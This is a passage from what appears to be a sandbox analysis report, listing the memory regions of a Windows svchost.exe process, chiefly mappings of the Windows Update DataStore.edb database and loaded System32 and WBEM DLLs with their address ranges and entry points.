0x7270000 end_va = 0x727ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 805 start_va = 0x7280000 end_va = 0x728ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 806 start_va = 0x7290000 end_va = 0x729ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 807 start_va = 0x72a0000 end_va = 0x72affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 808 start_va = 0x72b0000 end_va = 0x72bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 809 start_va = 0x72c0000 end_va = 0x72cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 810 start_va = 0x72d0000 end_va = 0x72dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 811 start_va = 0x72e0000 end_va = 0x72effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 812 start_va = 0x72f0000 end_va = 0x72fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 813 start_va = 0x7300000 end_va = 0x73fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007300000" filename = "" Region: id = 814 start_va = 0x7400000 end_va = 0x74fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007400000" filename = "" Region: id = 815 start_va = 0x7500000 end_va = 0x75fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007500000" filename = "" Region: id = 816 start_va = 0x7600000 end_va = 0x76fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007600000" filename = "" Region: id = 817 start_va = 0x7700000 end_va = 0x770ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 818 start_va = 0x7710000 end_va = 0x771ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 819 start_va = 0x7720000 end_va = 0x772ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 820 start_va = 0x7730000 end_va = 0x773ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 821 start_va = 0x7740000 end_va = 0x774ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 822 start_va = 0x7750000 end_va = 0x775ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 823 start_va = 0x7760000 end_va = 0x776ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 824 start_va = 0x7770000 end_va = 0x777ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 825 start_va = 0x7780000 end_va = 0x778ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 826 start_va = 0x7790000 end_va = 0x779ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 827 start_va = 0x77a0000 end_va = 0x77affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 828 start_va = 0x77b0000 end_va = 0x77bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 829 start_va = 0x77c0000 end_va = 0x77cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 830 start_va = 0x77d0000 end_va = 0x77dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 831 start_va = 0x77e0000 end_va = 0x77effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 832 start_va = 0x77f0000 end_va = 0x77fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 833 start_va = 0x7800000 end_va = 0x78fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007800000" filename = "" Region: id = 834 start_va = 0x7900000 end_va = 0x79fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007900000" filename = "" Region: id = 835 start_va = 0x7a00000 end_va = 0x7afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a00000" filename = "" Region: id = 836 start_va = 0x7b00000 end_va = 0x7b0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 837 start_va = 0x7b10000 end_va = 0x7b1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 838 start_va = 0x7b20000 end_va = 0x7b2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 839 start_va = 0x7b30000 end_va = 0x7b3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 840 start_va = 0x7b40000 end_va = 0x7b4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 841 start_va = 0x7b50000 end_va = 0x7c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b50000" filename = "" Region: id = 842 start_va = 0x7c50000 end_va = 0x7d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c50000" filename = "" Region: id = 843 start_va = 0x7d50000 end_va = 0x7e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d50000" filename = "" Region: id = 844 start_va = 0x7e50000 end_va = 0x7e5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 845 start_va = 0x7e60000 end_va = 0x7e6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 846 start_va = 0x7e70000 end_va = 0x7e7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 847 start_va = 0x7e80000 end_va = 0x7e8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 848 start_va = 0x7e90000 end_va = 0x7e9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 849 start_va = 0x7ea0000 end_va = 0x7eaffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 850 start_va = 0x7eb0000 end_va = 0x7ebffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 851 start_va = 0x7ec0000 end_va = 0x7ecffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 852 start_va = 0x7ed0000 end_va = 0x7edffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 853 start_va = 0x7ee0000 end_va = 0x7eeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 854 start_va = 0x7ef0000 end_va = 0x7efffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 855 start_va = 0x7f00000 end_va = 0x7ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f00000" filename = "" Region: id = 856 start_va = 0x8000000 end_va = 0x80fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008000000" filename = "" Region: id = 857 start_va = 0x8100000 end_va = 0x81fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008100000" filename = "" Region: id = 858 start_va = 0x8200000 end_va = 0x82fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008200000" filename = "" Region: id = 859 start_va = 0x8400000 end_va = 0x84fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008400000" filename = "" Region: id = 860 start_va = 0x8500000 end_va = 0x85fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008500000" filename = "" Region: id = 861 start_va = 0x8a00000 end_va = 0x8afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a00000" filename = "" Region: id = 862 start_va = 0x8b00000 end_va = 0x8bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b00000" filename = "" Region: id = 863 start_va = 0x8c00000 end_va = 0x8cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c00000" filename = "" Region: id = 864 start_va = 0x8d00000 end_va = 0x8dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d00000" filename = "" Region: id = 865 start_va = 0x9100000 end_va = 0xa0fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009100000" filename = "" Region: id = 866 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 867 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 868 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 869 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 870 start_va = 0x7ff6a3140000 end_va = 0x7ff6a314cfff monitored = 0 entry_point = 0x7ff6a3143980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 871 start_va = 0x7ff8610d0000 end_va = 0x7ff8610e6fff monitored = 0 entry_point = 0x7ff8610d7520 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 872 start_va = 0x7ff8610f0000 end_va = 0x7ff861133fff monitored = 0 entry_point = 0x7ff8611183e0 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 873 start_va = 0x7ff861140000 end_va = 0x7ff861157fff monitored = 0 entry_point = 0x7ff86114b850 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 874 start_va = 0x7ff861160000 end_va = 0x7ff8611bcfff monitored = 0 entry_point = 0x7ff86118e510 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 875 start_va = 0x7ff8611c0000 end_va = 0x7ff8611d7fff monitored = 0 entry_point = 0x7ff8611c4290 region_type = mapped_file name = "elscore.dll" filename = "\\Windows\\System32\\ELSCore.dll" (normalized: "c:\\windows\\system32\\elscore.dll") Region: id = 876 start_va = 0x7ff861390000 end_va = 0x7ff8613a7fff monitored = 0 entry_point = 0x7ff861391b10 region_type = mapped_file name = "locationframeworkinternalps.dll" filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll") Region: id = 877 start_va = 0x7ff861fb0000 end_va = 0x7ff862001fff monitored = 0 entry_point = 0x7ff861fb3d30 region_type = mapped_file name = "cryptngc.dll" filename = "\\Windows\\System32\\cryptngc.dll" (normalized: "c:\\windows\\system32\\cryptngc.dll") Region: id = 878 start_va = 0x7ff862010000 end_va = 0x7ff86220ffff monitored = 0 entry_point = 0x7ff862085240 region_type = mapped_file name = "wlidsvc.dll" filename = "\\Windows\\System32\\wlidsvc.dll" (normalized: "c:\\windows\\system32\\wlidsvc.dll") Region: id = 879 start_va = 0x7ff863a30000 end_va = 0x7ff863cdffff monitored = 0 entry_point = 0x7ff863a31cf0 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 880 start_va = 0x7ff863dc0000 end_va = 0x7ff863dc7fff monitored = 0 entry_point = 0x7ff863dc13b0 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 881 start_va = 0x7ff864060000 end_va = 0x7ff8640a5fff monitored = 0 entry_point = 0x7ff8640679a0 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 882 start_va = 0x7ff864160000 end_va = 0x7ff864171fff monitored = 0 entry_point = 0x7ff864161a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 883 start_va = 0x7ff864f80000 end_va = 0x7ff864fe6fff monitored = 0 entry_point = 0x7ff864f8b160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 884 start_va = 0x7ff864ff0000 end_va = 0x7ff865003fff monitored = 0 entry_point = 0x7ff864ff2a00 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 885 start_va = 0x7ff865340000 end_va = 0x7ff865350fff monitored = 0 entry_point = 0x7ff8653428d0 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 886 start_va = 0x7ff8653a0000 end_va = 0x7ff8653d1fff monitored = 0 entry_point = 0x7ff8653ab0c0 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 887 start_va = 0x7ff865450000 end_va = 0x7ff86555efff monitored = 0 entry_point = 0x7ff86548c010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 888 start_va = 0x7ff865f40000 end_va = 0x7ff865f5cfff monitored = 0 entry_point = 0x7ff865f44f60 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 889 start_va = 0x7ff866070000 end_va = 0x7ff86618cfff monitored = 0 entry_point = 0x7ff86609fe60 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 890 start_va = 0x7ff86c730000 end_va = 0x7ff86c75efff monitored = 0 entry_point = 0x7ff86c73ec60 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 891 start_va = 0x7ff86c8b0000 end_va = 0x7ff86c8c3fff monitored = 0 entry_point = 0x7ff86c8b3710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 892 start_va = 0x7ff86c8d0000 end_va = 0x7ff86c8f7fff monitored = 0 entry_point = 0x7ff86c8defc0 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 893 start_va = 0x7ff86c960000 end_va = 0x7ff86c97dfff monitored = 0 entry_point = 0x7ff86c96ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 894 start_va = 0x7ff86d180000 end_va = 0x7ff86d1fffff monitored = 0 entry_point = 0x7ff86d1ad280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 895 start_va = 0x7ff86d220000 end_va = 0x7ff86d233fff monitored = 0 entry_point = 0x7ff86d225080 region_type = mapped_file name = "windows.staterepositorybroker.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryBroker.dll" (normalized: "c:\\windows\\system32\\windows.staterepositorybroker.dll") Region: id = 896 start_va = 0x7ff86d2d0000 end_va = 0x7ff86d305fff monitored = 0 entry_point = 0x7ff86d2d27f0 region_type = mapped_file name = "windows.networking.hostname.dll" filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll") Region: id = 897 start_va = 0x7ff86d310000 end_va = 0x7ff86d325fff monitored = 0 entry_point = 0x7ff86d311d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 898 start_va = 0x7ff86e3e0000 end_va = 0x7ff86e3f0fff monitored = 0 entry_point = 0x7ff86e3e7480 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 899 start_va = 0x7ff86e400000 end_va = 0x7ff86e483fff monitored = 0 entry_point = 0x7ff86e418d50 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 900 start_va = 0x7ff86e590000 end_va = 0x7ff86e5a5fff monitored = 0 entry_point = 0x7ff86e5955e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 901 start_va = 0x7ff86e5b0000 end_va = 0x7ff86e685fff monitored = 0 entry_point = 0x7ff86e5da800 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 902 start_va = 0x7ff86e690000 end_va = 0x7ff86e6a5fff monitored = 0 entry_point = 0x7ff86e691af0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 903 start_va = 0x7ff86e6b0000 end_va = 0x7ff86e6c9fff monitored = 0 entry_point = 0x7ff86e6b2330 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 904 start_va = 0x7ff86e6d0000 end_va = 0x7ff86e6dcfff monitored = 0 entry_point = 0x7ff86e6d1420 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 905 start_va = 0x7ff86e8d0000 end_va = 0x7ff86e933fff monitored = 0 entry_point = 0x7ff86e8ebed0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 906 start_va = 0x7ff86e940000 end_va = 0x7ff86e964fff monitored = 0 entry_point = 0x7ff86e949900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 907 start_va = 0x7ff86e970000 end_va = 0x7ff86e983fff monitored = 0 entry_point = 0x7ff86e971800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 908 start_va = 0x7ff86e990000 end_va = 0x7ff86ea85fff monitored = 0 entry_point = 0x7ff86e9c9590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 909 start_va = 0x7ff86ea90000 end_va = 0x7ff86eb03fff monitored = 0 entry_point = 0x7ff86eaa5eb0 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 910 start_va = 0x7ff86eb10000 end_va = 0x7ff86ec46fff monitored = 0 entry_point = 0x7ff86eb50480 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 911 start_va = 0x7ff86ef10000 end_va = 0x7ff86ef1efff monitored = 0 entry_point = 0x7ff86ef14960 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 912 start_va = 0x7ff86efa0000 end_va = 0x7ff86efb0fff monitored = 0 entry_point = 0x7ff86efa2fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 913 start_va = 0x7ff86efc0000 end_va = 0x7ff86efddfff monitored = 0 entry_point = 0x7ff86efc3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 914 start_va = 0x7ff86efe0000 end_va = 0x7ff86f061fff monitored = 0 entry_point = 0x7ff86efe2a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 915 start_va = 0x7ff86f0c0000 end_va = 0x7ff86f0fffff monitored = 0 entry_point = 0x7ff86f0ccbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 916 start_va = 0x7ff86f100000 end_va = 0x7ff86f146fff monitored = 0 entry_point = 0x7ff86f101d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 917 start_va = 0x7ff86f220000 end_va = 0x7ff86f236fff monitored = 0 entry_point = 0x7ff86f226620 region_type = mapped_file name = "msauserext.dll" filename = "\\Windows\\System32\\msauserext.dll" (normalized: "c:\\windows\\system32\\msauserext.dll") Region: id = 918 start_va = 0x7ff86f240000 end_va = 0x7ff86f281fff monitored = 0 entry_point = 0x7ff86f243670 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 919 start_va = 0x7ff86f390000 end_va = 0x7ff86f3aefff monitored = 0 entry_point = 0x7ff86f3937e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 920 start_va = 0x7ff86f3b0000 end_va = 0x7ff86f428fff monitored = 0 entry_point = 0x7ff86f3b76a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 921 start_va = 0x7ff86f4a0000 end_va = 0x7ff86f542fff monitored = 0 entry_point = 0x7ff86f4a2c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 922 start_va = 0x7ff86f550000 end_va = 0x7ff86f5a1fff monitored = 0 entry_point = 0x7ff86f555770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 923 start_va = 0x7ff86f5b0000 end_va = 0x7ff86f5ddfff monitored = 1 entry_point = 0x7ff86f5b2300 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 924 start_va = 0x7ff86f5e0000 end_va = 